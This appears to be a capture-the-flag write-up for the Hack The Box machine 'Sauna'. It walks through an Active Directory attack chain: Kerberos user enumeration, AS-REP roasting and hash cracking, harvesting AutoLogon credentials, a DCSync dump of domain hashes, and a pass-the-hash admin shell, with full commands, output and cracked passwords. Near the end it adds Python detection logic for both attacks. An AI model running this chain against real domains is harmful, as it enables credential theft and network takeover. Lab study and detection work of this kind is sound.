
HTB - Sauna

Enumeration


Scope

IP Address: 10.10.10.175

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ nmap -p- --min-rate 10000 $ip -Pn

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
80/tcp   open  http             syn-ack
88/tcp   open  kerberos-sec     syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
389/tcp  open  ldap             syn-ack
445/tcp  open  microsoft-ds     syn-ack
464/tcp  open  kpasswd5         syn-ack
593/tcp  open  http-rpc-epmap   syn-ack
636/tcp  open  ldapssl          syn-ack
3268/tcp open  globalcatLDAP    syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5985/tcp open  wsman            syn-ack
9389/tcp open  adws             syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-07 17:57:41Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-07T17:57:54
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m06s
* Open ports: 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
* UDP Open ports: 53 - 123 - 389
* Services: DNS - HTTP - KERBEROS - LDAP - SMB - winRM - NTP
* Versions: IIS httpd 10.0
* Important Notes: EGOTISTICAL-BANK.LOCAL

Enumeration

DNS

Tried a zone transfer:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ dig axfr EGOTISTICAL-BANK.LOCAL @$ip                       

; <<>> DiG 9.19.19-1-Debian <<>> axfr EGOTISTICAL-BANK.LOCAL @10.10.10.175
;; global options: +cmd
; Transfer failed.

SMB

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ smbclient -N -L //$ip                       
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ crackmapexec smb $ip -u ''  -p '' --shares                      

SMB   10.10.10.175    445    SAUNA    [+] EGOTISTICAL-BANK.LOCAL\: 
SMB   10.10.10.175    445    SAUNA    [-] Error enumerating shares: STATUS_ACCESS_DENIED

RPC

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

Kerberos

I always try to enumerate usernames when AD exists on the machine.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ kerbrute userenum --dc $ip -d EGOTISTICAL-BANK.LOCAL -t 100 -o users.list /usr/share/seclists/Usernames/jsmith.txt   

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/07/24 - Ronnie Flathers @ropnop

2024/07/07 07:05:40 >  Using KDC(s):
2024/07/07 07:05:40 >   10.10.10.175:88

2024/07/07 07:05:41 >  [+] VALID USERNAME:       hsmith@EGOTISTICAL-BANK.LOCAL
2024/07/07 07:05:41 >  [+] VALID USERNAME:       fsmith@EGOTISTICAL-BANK.LOCAL

We got two valid users, so I will try an AS-REP Roasting attack against both of them.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/hsmith -dc-ip $ip -no-pass -request -format hashcat
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Getting TGT for hsmith
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip $ip -no-pass -request -format hashcat
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:e94ba92c6e2e5a56c63f6b44b33a7c18$<snip>

Initial Access


We got a hit for one user, so I will try to crack the hash with hashcat.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:e94ba92c6e2e5a56c63f6b44b33a7c18$<snip>:Thestrokes23

Session..........: hashcat
Status...........: Cracked

And it was successful :)

I will try to connect to SMB and WinRM with the credentials found.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ crackmapexec smb $ip -u 'fsmith'  -p 'Thestrokes23'         

SMB   10.10.10.175   445  SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ crackmapexec winrm $ip -u 'fsmith'  -p 'Thestrokes23'

WINRM  10.10.10.175 5985 SAUNA  [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ evil-winrm -i $ip -u fsmith -p 'Thestrokes23' 

*Evil-WinRM* PS C:\Users\FSmith> type Desktop\user.txt
a0865592caf1d5a2d07d1183aa080f0f

User Flag: a0865592caf1d5a2d07d1183aa080f0f


Privilege Escalation

After obtaining valid credentials, I hurried to BloodHound to enumerate the domain, but before that I updated /etc/hosts with the following record:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ tail -n1 /etc/hosts
10.10.10.175 EGOTISTICAL-BANK.LOCAL SAUNA.EGOTISTICAL-BANK.LOCAL

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ bloodhound-python -u 'fsmith' -p 'Thestrokes23' -ns $ip -d EGOTISTICAL-BANK.LOCAL -c all
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL

Creating a .zip file to upload to the BloodHound GUI:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ zip sauna.zip *.json

Starting BloodHound with the following commands:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ sudo neo4j start
[sudo] password for kali:                                                                              
<snip>
Started neo4j (pid:18524). It is available at http://localhost:7474  

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ bloodhound

I uploaded the zip file created earlier and began enumerating the domain.

When I clicked List all Kerberoastable Accounts, hsmith was listed, so I requested its TGS and tried to crack it.

I did this, but it didn't reveal anything useful: hsmith had the same password as fsmith and none of the privileges we were looking for.

*Evil-WinRM* PS C:\Users> ls

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/25/2020   1:05 PM                Administrator
d-----        1/23/2020   9:52 AM                FSmith
d-r---        1/22/2020   9:32 PM                Public
d-----        1/24/2020   4:05 PM                svc_loanmgr

There is another user on the machine called svc_loanmgr, and after looking it up in BloodHound I realized that I could perform a DCSync attack if I had this account.

I moved winpeas.exe to the current folder, uploaded it to the machine via evil-winrm, and ran it:

*Evil-WinRM* PS C:\Tools> upload winpeas.exe
*Evil-WinRM* PS C:\Tools> .\winpeas.exe

╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

We got the svc_loanmgr password (the AutoLogon entry names the user svc_loanmanager, but the account on the box is svc_loanmgr). Let's perform the DCSync attack from the Linux attack box:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ crackmapexec smb $ip -u svc_loanmgr -p 'Moneymakestheworldgoround!' --ntds 
SMB         10.10.10.175    445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! 
SMB         10.10.10.175    445    SAUNA            [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         10.10.10.175    445    SAUNA            [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.10.175    445    SAUNA            Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70xxxxxxxxxxxe:::
SMB         10.10.10.175    445    SAUNA            Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.175    445    SAUNA            krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
SMB         10.10.10.175    445    SAUNA            EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
SMB         10.10.10.175    445    SAUNA            EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
SMB         10.10.10.175    445    SAUNA            EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SMB         10.10.10.175    445    SAUNA            SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:21505d6dd773d86031623f0b8e8c98ab:::
SMB         10.10.10.175    445    SAUNA            [+] Dumped 7 NTDS hashes to /home/kali/.cme/logs/SAUNA_10.10.10.175_2024-07-07_081911.ntds of which 6 were added to the database
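On the defender's side, the two attacks used in this writeup (AS-REP Roasting above and the DCSync just shown) each leave a distinctive footprint in the Windows Security log. The following is an added example, not code from the original post: it runs simple detection logic over constructed 4768 and 4662 event records, assuming the field names of a Security log export (the events, the 10.10.14.5 address and the EVENTS list are all constructed).

```python
"""Detection logic for the two attacks in this writeup: AS-REP roasting
(Kerberos TGT event 4768) and DCSync (directory-access event 4662).
Added example, not from the original post; the event records below are
constructed to mimic fields of a Windows Security log export."""

# Control-access rights that DCSync exercises on the domain object:
# DS-Replication-Get-Changes, -Get-Changes-All, -Get-Changes-In-Filtered-Set
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "89e95b76-444d-4c62-991a-0facbeda640c",
}

# Constructed sample events (subset of 4768 / 4662 fields; 10.10.14.5 is a
# made-up attacker address, SAUNA$ is the DC computer account from the box).
EVENTS = [
    {"EventID": 4768, "TargetUserName": "fsmith", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4768, "TargetUserName": "hsmith", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.175"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

def asrep_roast_candidates(events):
    """PreAuthType 0 means the TGT was issued without pre-authentication
    (only possible for DONT_REQ_PREAUTH accounts); RC4 (0x17) matches the
    $krb5asrep$23$ format GetNPUsers requested above. Returns (user, ip)."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e["EventID"] == 4768 and e["PreAuthType"] == "0"
            and e["TicketEncryptionType"].lower() == "0x17"]

def dcsync_suspects(events, dc_accounts):
    """A principal that is not a domain controller computer account using
    replication rights is the classic DCSync footprint. Needs the
    'Directory Service Access' audit subcategory enabled to log 4662."""
    hits = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        guids = {g.strip("{}").lower() for g in e["Properties"].split()}
        if guids & REPLICATION_GUIDS and e["SubjectUserName"].upper() not in dc_accounts:
            hits.append(e["SubjectUserName"])
    return hits
```

The same two checks generalize to any account: a 4768 with PreAuthType 0 is itself evidence that the account has pre-authentication disabled, and replication rights held by anything other than DC computer accounts (and the few known replication identities, such as Azure AD Connect) should be reviewed.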

Log in as Administrator with impacket-psexec, passing the dumped NT hash (pass-the-hash):

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ impacket-psexec EGOTISTICAL-BANK.LOCAL/administrator@$ip -hashes :823452073d75b9d1cf70xxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file dPcptKVP.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service tQAK on 10.10.10.175.....
[*] Starting service tQAK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> 
C:\Windows\system32> cd C:\users\administrator\desktop
C:\Users\Administrator\Desktop> type root.txt
b9955377f34c4330d2f5xxxxxxxxxxxxxxx

Root Flag: b9955377f34c4330d2f5xxxxxxxxxxxxxxx
